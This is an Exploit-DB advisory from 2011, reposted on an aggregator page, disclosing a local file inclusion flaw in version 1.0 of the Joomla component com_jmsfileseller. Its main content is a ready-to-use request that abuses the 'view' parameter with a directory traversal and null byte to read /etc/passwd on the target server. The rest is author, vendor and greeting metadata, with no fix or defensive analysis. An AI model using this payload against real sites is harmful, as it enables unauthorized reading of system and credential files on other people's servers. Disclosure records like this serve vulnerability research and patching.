Joomla! Component com_jmsfileseller – Local File Inclusion

• Exploit Database
• 483 阅读

• 作者： Valentin
  日期： 2011-05-28
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17338/

• # Exploit Title: Joomla Component com_jmsfileseller Local File Inclusion Vulnerability 
  # Date: 28.05.2011
  # Author: Valentin
  # Category: webapps/0day
  # Version: 1.0
  
  # Tested on:
  # CVE :
  # Code : 
  
  
  [:::::::::::::::::::::::::::::::::::::: 0x1 ::::::::::::::::::::::::::::::::::::::]
  >> General Information 
  Advisory/Exploit Title = Joomla Component com_msfileseller Local File Inclusion Vulnerability 
  Author = Valentin Hoebel
  Contact = valentin@xenuser.org
  
  
  [:::::::::::::::::::::::::::::::::::::: 0x2 ::::::::::::::::::::::::::::::::::::::]
  >> Product information
  Name = JMS FileSeller
  Vendor = Joommasters team
  Vendor Website = http://joommasters.com/
  Affected Version(s) = 1.0
  
  
  [:::::::::::::::::::::::::::::::::::::: 0x3 ::::::::::::::::::::::::::::::::::::::]
  >> Local File Inclusion
  URL: index.php?option=com_jmsfileseller&view=<LFI value>&cat_id=1&Itemid=27
  Vulnerable parameters: view
  Example: index.php?option=com_jmsfileseller&view=../../../etc/passwd%00&cat_id=12&Itemid=27
  
  
  [:::::::::::::::::::::::::::::::::::::: 0x4 ::::::::::::::::::::::::::::::::::::::]
  >> Additional Information
  Advisory/Exploit Published = 28.05.2011
  
  
  [:::::::::::::::::::::::::::::::::::::: 0x5 ::::::::::::::::::::::::::::::::::::::]
  >> Misc
  Greetz = cr4wl3r, JosS, Todd and Josh from packetstormsecurity.org, exploit-db.com
  
  
  [:::::::::::::::::::::::::::::::::::::: EOF ::::::::::::::::::::::::::::::::::::::]